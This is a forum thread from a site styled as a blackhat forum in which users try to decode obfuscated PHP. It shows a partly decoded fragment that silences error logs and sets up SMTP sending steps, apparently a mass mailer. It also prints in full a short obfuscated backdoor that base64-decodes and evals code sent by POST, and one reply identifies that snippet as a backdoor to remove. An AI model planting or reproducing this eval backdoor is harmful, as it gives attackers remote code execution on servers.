Best Blackhat Forum

Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [REQ] Decode file PHP
Full Version: [REQ] Decode file PHP
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

jazz1611

11-20-2015, 06:51 PM
Who can decode this file php?

File: http://www48.zippyshare.com/v/yT711hZj/file.html

SQUIRT

11-20-2015, 08:16 PM
this file is with YARRAK ENCRYPTED

jazz1611

11-28-2015, 02:54 AM
Who can decode this file?

kolaz

11-28-2015, 05:09 AM
Here is a sample of your file:
PHP Code:
@ini_set("error_log"NULL);
@ini_set("log_errors"0);
@error_reporting(NULL);
define("DNS_TYPE_MX"0x000F);
define("DNS_TYPE_A"0x0001);
define("DNS_TYPE_NS"0x0002);
define("DNS_STEP_QESTION"1);
define("DNS_STEP_ANSWER"2);
define("DNS_STEP_AUTHORITY"3);
define("DNS_STEP_ADDITIONAL"4);
define("SOCKET_TYPE_SOCKET"1);
define("SOCKET_TYPE_FSOCKET"2);
define("SOCKET_TYPE_STREAM"4);
define("SOCKET_TYPE_NO"5);
define("SOCKET_PROTO_TCP"1);
define("SOCKET_PROTO_UDP"2);
define("STEP_CONNECT"0);
define("STEP_CONNECTED"1);
define("STEP_EHLO"2);
define("STEP_MAILFROM"3);
define("STEP_RCPTTO"4);
define("STEP_DATA"5);
define("STEP_BODY"6);
define("STEP_QUIT"7);
define("STEP_COMPLETED"8);

sbrnc59($t60NULL);
$ulkfl16 = array(
    "toList" => "",
    "fromLogin" => "",
    "fromName" => "",
    "subjTempl" => "",
    "bodyTempl" => "",
    "hostFrom" => ""
);

if (FALSE == yqffb44($t60$ulkfl16)) {
    echo PHP_OS '+' md5(0987654321
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 

Please add me reputation.

jazz1611

11-28-2015, 04:27 PM

I need full decode this file, you can help me?

dhanyasashi

11-28-2015, 04:39 PM
(11-28-2015 05:09 AM)kolaz Wrote: [ -> ]Here is a sample of your file:
PHP Code:
@ini_set("error_log"NULL);
@ini_set("log_errors"0);
@error_reporting(NULL);
define("DNS_TYPE_MX"0x000F);
define("DNS_TYPE_A"0x0001);
define("DNS_TYPE_NS"0x0002);
define("DNS_STEP_QESTION"1);
define("DNS_STEP_ANSWER"2);
define("DNS_STEP_AUTHORITY"3);
define("DNS_STEP_ADDITIONAL"4);
define("SOCKET_TYPE_SOCKET"1);
define("SOCKET_TYPE_FSOCKET"2);
define("SOCKET_TYPE_STREAM"4);
define("SOCKET_TYPE_NO"5);
define("SOCKET_PROTO_TCP"1);
define("SOCKET_PROTO_UDP"2);
define("STEP_CONNECT"0);
define("STEP_CONNECTED"1);
define("STEP_EHLO"2);
define("STEP_MAILFROM"3);
define("STEP_RCPTTO"4);
define("STEP_DATA"5);
define("STEP_BODY"6);
define("STEP_QUIT"7);
define("STEP_COMPLETED"8);

sbrnc59($t60NULL);
$ulkfl16 = array(
    "toList" => "",
    "fromLogin" => "",
    "fromName" => "",
    "subjTempl" => "",
    "bodyTempl" => "",
    "hostFrom" => ""
);

if (FALSE == yqffb44($t60$ulkfl16)) {
    echo PHP_OS '+' md5(0987654321
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 

Please add me reputation.

hmm this file hexa encoded, just simple method for decoded this file, you read statment if (FALSE == yqffb44($t60, $ulkfl16)) {
echo PHP_OS . '+' . md5(0987654321) 43smoke

jazz1611

11-30-2015, 09:53 PM
The new code was encoded. who can decode it too?

PHP Code:
<?php
$cmtf46 "a6dcbos_ep4t";
$vmn5 strtolower($cmtf46[4] . $cmtf46[0] . $cmtf46[6] . $cmtf46[8] . $cmtf46[1] . $cmtf46[10] . $cmtf46[7] . $cmtf46[2] . $cmtf46[8] . $cmtf46[3] . $cmtf46[5] . $cmtf46[2] . $cmtf46[8]);
$bfm5 strtoupper($cmtf46[7] . $cmtf46[9] . $cmtf46[5] . $cmtf46[6] . $cmtf46[11]);
if (isset($ {
    $bfm5
}
['na04af1'])) {
    eval($vmn5($ {
        $bfm5
    }
    ['na04af1']));
}
?>

graygandalf

11-30-2015, 11:14 PM
hi this little script execute a script posted with method post

if you have this script on your server, remove it...

is a easy backdoor
Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [REQ] Decode file PHP
Reference URL's